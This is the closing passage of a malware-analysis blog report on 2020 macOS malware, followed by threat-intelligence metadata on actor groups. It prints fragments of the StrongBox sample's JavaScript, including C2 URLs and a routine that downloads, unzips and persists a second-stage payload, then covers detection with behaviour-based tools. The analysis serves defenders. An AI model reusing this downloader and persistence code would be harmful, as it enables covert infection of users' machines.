ressslt = execRoot('ls ~/Library/Safari', function(err, data, stderr){\r\n 2\r\n 3 if(!data || data ==\"\")\r\n 4 {\r\n 5 const options = {\r\n 6 type: 'question',\r\n 7 buttons: ['Ok'],\r\n 8 defaultId: 2,\r\n 9 title: 'StrongBox - Operation Not Permitted',\r\n10 message: 'Action Required',\r\n11 detail: \"Please follow the instructions to resolve this issue\r\n12 System Preferences -\u003e Security \u0026 Privacy -\u003e\r\n13 Full Disk Access to Terminal.app\"\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 53 of 62\n\n14 };\r\n15\r\n16 dialog.showMessageBox(null, options, (response, checkboxChecked) =\u003e {\r\n17 app.quit();\r\n18 app.exit();\r\n19 });\r\n20\r\n21 } });\r\n22}\r\nIn the StrongBox sample, the main.js file contains logic related to environmental checks (i.e. VM \u0026 FDA\r\nchecks), the core of the malicious logic appears in the signature.js file. As such, let’s now we dive into the\r\nsignature.js file.\r\nAt the start of the signature.js file we find various variables being initialized:\r\n1var srur = 'https://download.strongbox.in/strongbox/';\r\n2var srdr = 'https://download.strongbox.in/A0B74607.php';\r\n3var loclpth = path.join(app1.getPath('appData'), '/SCloud');\r\nThese variable appear to the malware’s command and control server and a directory path, found within the user\r\napplication data directory (that we’ll see is used for persistence).\r\nThe malware’s server, download.strongbox.in, appears to be now offline:\r\n$ nslookup download.strongbox.in Server: 8.8.8.8 Address: 8.8.8.8#53\r\n** server can’t find download.strongbox.in: SERVFAIL\r\nThe code snippet, getPath(‘appData’), will return the “Per-user application data directory”, which on macOS\r\npoints to ~/Library/Application Support.\r\nIf needed, the malware then will create the directory specified in the loclpth variable ( ~/Library/Application\r\nSupport/SCloud ):\r\n1if (!fs.existsSync(loclpth)){\r\n2 fs.mkdirSync(loclpth,0700);\r\nFurther down in the signature.js file, we can see the malware invoking a function named updates via the\r\nsetInterval API:\r\n1setInterval(updates,180000)\r\nAs its name implies, the updates will download a file (and “update”) from the server specified in the srdr\r\nvariable ( https://download.strongbox.in/A0B74607.php ):\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 54 of 62\n\n1function updates()\r\n 2{\r\n 3 const insst = axios.create();\r\n 4 var hash = store.get('Hash')\r\n 5 axios.post(srdr, {\r\n 6 value: 'update',\r\n 7 hash: hash\r\n 8 })\r\n 9 .then((response) =\u003e {\r\n10 var respns = response.data;\r\n11 if(respns){\r\n12 var rply = respns.split('#');\r\n13 var fname = rply[0].trim();\r\n14 var agentTask = rply[1];\r\n15 }\r\n16\r\n17 ...\r\n18\r\n19 var dpath;\r\n20 if(osvar.trim()==\"darwin\")\r\n21 var file = fs.createWriteStream(dpath);\r\n22 var request = https.get(srur+'Updates/' + fname, function(response) {\r\n23 response.pipe(file);\r\n24 file.on('finish', function() {\r\n25 getDateTime();\r\n26 extractzip1(fname,agentTask);\r\n27 file.close();\r\n28 });\r\n29\r\n30 ...\r\n31}\r\nIf this remote server ( https://download.strongbox.in/A0B74607.php ), provides a payload for download, the\r\nmalware will then invoke the extractzip1 function:\r\n 1function extractzip1(fname,agentTask)\r\n 2{\r\n 3\r\n 4 var source;\r\n 5 var sourceTozip;\r\n 6 if(osvar.trim()==\"darwin\") {\r\n 7 source = loclpth+\"/\"+fname;\r\n 8 sourceTozip = source+\".zip\";\r\n 9 }\r\n10\r\n11 ...\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 55 of 62\n\n12 fs.rename(source, sourceTozip, function(err) {\r\n13\r\n14 });\r\n15\r\n16\r\n17 if(osvar.trim()==\"darwin\") {\r\n18 var extract = require('extract-zip')\r\n19 var target= loclpth;\r\n20 extract(sourceTozip, {dir: target}, function (err) {\r\n21\r\n22 ...\r\n23 scheduleMac(fname,agentTask);\r\n24 }\r\n25 });\r\n26 }\r\n27}\r\nAfter appending .zip , the malware extracts the downloaded (zip) file to the location specified in the loclpth\r\nvariable ( ~/Library/Application Support/SCloud ). Once extracted it invokes a function we discussed earlier\r\nscheduleMac …which persists (as a cronjob) and launches the downloaded payload.\r\nUnfortunately the remote servers (e.g. download.strongbox.in ) are now offline, and as such, the 2nd stage\r\npayloads are not available for analysis.\r\n👾 And All Others\r\nThis blog post provided a comprehensive technical analysis of the new mac malware of 2020. However it did not\r\ncover adware or malware from previous years. Of course, this is not to say such items are unimportant …\r\nespecially when such adware is notarized (to bypass Apple’s new security checks), or when existing malware is\r\nupdated.\r\nAs such, here we include a list (and links to detailed writeups) of other notable items from 2020, for the interested\r\nreader.\r\n👾 Shlayer / Vindinstaller Dropper\r\nIn June, Intego researchers uncovered:\r\n\"...a new [adware dropper] in the wild, actively spreading through malicious results in Google\r\nsearches.\r\nIntego identifies the [adware dropper] as unique new variants of OSX/Shlayer (the original\r\nvariant of which was first discovered by Intego in 2018) and OSX/Bundlore (with similarities to\r\npast versions of OSX/MacOffers and Mughthesec/BundleMeUp/Adload)\" -Intego\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 56 of 62\n\nAdware Dropper (credit: Intego)\r\nWriteup(s):\r\n  “New Mac malware reveals Google searches can be unsafe”\r\n  “How a New macOS Malware Dropper Delivers VindInstaller Adware”\r\n👾 OSX.GMERA (new campaign)\r\nIn July, ESET researchers lured GMERA malware operators “to remotely control their Mac honeypots”.\r\n\"To learn more about the intentions of this group, we set up honeypots where we monitored all\r\ninteractions between the GMERA reverse shell backdoors and the operators of this malware.\" -\r\nESET\r\nGMERA (run.sh) (credit: ESET)\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 57 of 62\n\nWe covered OSX.GMERA in our “Mac malware of 2019 report”, although ESET researchers report is\r\nnoteworthy (in the context of 2020), as they uncovered a new campaign leveraging this malware.\r\nWriteup:\r\n  “Mac cryptocurrency trading application rebranded, bundled with malware”\r\n👾 Notarized Adware\r\nIn August, Peter Dantini (@PokeCaptain) noticed that the website homebrew.sh (not to be confused with\r\nthe legitimate Homebrew website brew.sh), was hosting an active adware campaign\r\n…and that the adware has been notarized (read: approved) by Apple:\r\nNotarized Adware\r\nThis means even on Big Sur, the adware will (still) be allowed to run!\r\nIn Apple’s own words, notarization was supposed to “give users more confidence that [software] …has\r\nbeen checked by Apple for malicious components.” …maybe not?\r\nWriteup:\r\n  “Apple Approved Malware”\r\n👾 Bundalor Dropper\r\nIn November, SentinelOne researchers published a report on an adware installer that (ab)used resource\r\nforks to store its malicious payloads.\r\n…the adware installer also provided user-instructions to “bypass” macOS’s latest malware mitigations (e.g.\r\nnotarization):\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 58 of 62\n\nAdware Dropper (credit: SentinelOne)\r\nWriteup:\r\n  “Resourceful macOS Malware Hides in Named Fork”\r\n👾 OSX.OceanLotus (new variant)\r\nAlso in November, TrendMicro researchers discovered a backdoor that they tied to the OceanLotus Group.\r\nUpon closer analysis, the application (which masquerades as Office documents) appears to be an updated\r\nvariant of OSX.OceanLotus.F :\r\n\"Due to similarities in dynamic behavior and code with previous OceanLotus samples, it was\r\nconfirmed to be a variant of the said malware [OSX.OceanLotus.F]\" -TrendMicro\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 59 of 62\n\nOceanLotus (credit: TrendMicro)\r\nWriteup:\r\n  “New MacOS Backdoor Connected to OceanLotus Surfaces”\r\nDetections\r\nNew malware is notoriously difficult to detect via traditional signature-based approaches …as, well, it’s new! A\r\nfar better approach is to leverage heuristics or behaviors, that can detect such malware, even with no a priori\r\nknowledge of the specific (new) threats.\r\nFor example, imagine you open an Office Document that (unbeknownst to you) contains an exploit or malicious\r\nmacros which installs a persistent backdoor. This is clearly an unusual behavior, that should be detected and\r\nalerted upon.\r\nGood news, our free macOS security tools do not leverage signatures, but instead monitor for such (unusual, and\r\nlikely malicious) behaviors. This allows them to detect and alert on various behaviors of all the new malware of\r\n2020 (with no prior knowledge of the malware).\r\nFor example, let’s look at how OSX.Dacls was be detected by our free tools:\r\nBlockBlock readily detects when the malware’s attempts to persist as a launch item ( com.aex-loop.agent.plist → ~/Library/.mina ):\r\nLuLu detects the malware’s unauthorized network communications to the attackers’ remote command \u0026\r\ncontrol server ( ~/Library/.mina → 67.43.239.146 ):\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 60 of 62\n\nKnockKnock can scan a system and generically if it is infected with OSX.Dacls , by detecting its launch\r\nitem persistence ( com.aex-loop.agent.plist → ~/Library/.mina ):\r\nRecall that OSX.EvilQuest would ransom a user’s files. Well good news, our RansomWhere? utility could both\r\ndetect and stop this malicious behavior in its tracks:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 61 of 62\n\nThe other new malware samples are similarly detected when they persist, generate an unauthorized network\r\nconnection, or perform other malicious actions.\r\nConclusion:\r\nWell that’s a wrap! Thanks for joining our “journey” as we wandered through the macOS malware of 2020.\r\nWith the continued growth and popularity of macOS (especially in the enterprise!), 2021 will surely bring a bevy\r\nof new macOS malware.\r\n…so, stay safe out there!\r\nAnd if you’d like to learn more about macOS malware and malware analysis techniques, I’ve written an entire\r\n(free) book on this very topic:\r\n📚 The Art Of Mac Malware, Vol. 0x1: Analysis\r\nLove these blog posts?\r\nSupport my tools \u0026 writing on patreon :)\r\nSource: https://objective-see.com/blog/blog_0x5F.html\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 62 of 62", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://objective-see.com/blog/blog_0x5F.html" ], "report_names": [ "blog_0x5F.html" ], "threat_actors": [ { "id": "af509bbb-8d18-4903-a9bd-9e94099c6b30", "created_at": "2023-01-06T13:46:38.585525Z", "updated_at": "2026-04-10T02:00:03.030833Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "OceanLotus", "ATK17", "G0050", "APT-C-00", "APT-32", "Canvas Cyclone", "SeaLotus", "Ocean Buffalo", "OceanLotus Group", "Cobalt Kitty", "Sea Lotus", "APT 32", "POND LOACH", "TIN WOODLAWN", "Ocean Lotus" ], "source_name": "MISPGALAXY:APT32", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "870f6f62-84f5-48ca-a18e-cf2902cd6924", "created_at": "2022-10-25T15:50:23.303818Z", "updated_at": "2026-04-10T02:00:05.301184Z", "deleted_at": null, "main_name": "APT32", "aliases": [ "APT32", "SeaLotus", "OceanLotus", "APT-C-00", "Canvas Cyclone" ], "source_name": "MITRE:APT32", "tools": [ "Mimikatz", "ipconfig", "Kerrdown", "Cobalt Strike", "SOUNDBITE", "OSX_OCEANLOTUS.D", "KOMPROGO", "netsh", "RotaJakiro", "PHOREAL", "Arp", "Denis", "Goopy" ], "source_id": "MITRE", "reports": null }, { "id": "544ecd2c-82c9-417c-9d98-d1ae395df964", "created_at": "2025-10-29T02:00:52.035025Z", "updated_at": "2026-04-10T02:00:05.408558Z", "deleted_at": null, "main_name": "AppleJeus", "aliases": [ "AppleJeus", "Gleaming Pisces", "Citrine Sleet", "UNC1720", "UNC4736" ], "source_name": "MITRE:AppleJeus", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "5da6b5fd-1955-412a-81aa-069fb50b6e31", "created_at": "2025-08-07T02:03:25.116085Z", "updated_at": "2026-04-10T02:00:03.668978Z", "deleted_at": null, "main_name": "TIN WOODLAWN", "aliases": [ "APT32 ", "Cobalt Kitty", "OceanLotus", "WOODLAWN " ], "source_name": "Secureworks:TIN WOODLAWN", "tools": [ "Cobalt Strike", "Denis", "Goopy", "JEShell", "KerrDown", "Mimikatz", "Ratsnif", "Remy", "Rizzo", "RolandRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "2439ad53-39cc-4fff-8fdf-4028d65803c0", "created_at": "2022-10-25T16:07:23.353204Z", "updated_at": "2026-04-10T02:00:04.55407Z", "deleted_at": null, "main_name": "APT 32", "aliases": [ "APT 32", "APT-C-00", "APT-LY-100", "ATK 17", "G0050", "Lotus Bane", "Ocean Buffalo", "OceanLotus", "Operation Cobalt Kitty", "Operation PhantomLance", "Pond Loach", "SeaLotus", "SectorF01", "Tin Woodlawn" ], "source_name": "ETDA:APT 32", "tools": [ "Agentemis", "Android.Backdoor.736.origin", "AtNow", "Backdoor.MacOS.OCEANLOTUS.F", "BadCake", "CACTUSTORCH", "CamCapture Plugin", "CinaRAT", "Cobalt Strike", "CobaltStrike", "Cuegoe", "DKMC", "Denis", "Goopy", "HiddenLotus", "KOMPROGO", "KerrDown", "METALJACK", "MSFvenom", "Mimikatz", "Nishang", "OSX_OCEANLOTUS.D", "OceanLotus", "PHOREAL", "PWNDROID1", "PhantomLance", "PowerSploit", "Quasar RAT", "QuasarRAT", "RatSnif", "Remy", "Remy RAT", "Rizzo", "Roland", "Roland RAT", "SOUNDBITE", "Salgorea", "Splinter RAT", "Terracotta VPN", "Yggdrasil", "cobeacon", "denesRAT", "fingerprintjs2" ], "source_id": "ETDA", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434394, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/bf512036c3e5a2143435037b5c30accba8a3ee56.pdf", "text": "https://archive.orkl.eu/bf512036c3e5a2143435037b5c30accba8a3ee56.txt", "img": "https://archive.orkl.eu/bf512036c3e5a2143435037b5c30accba8a3ee56.jpg" } }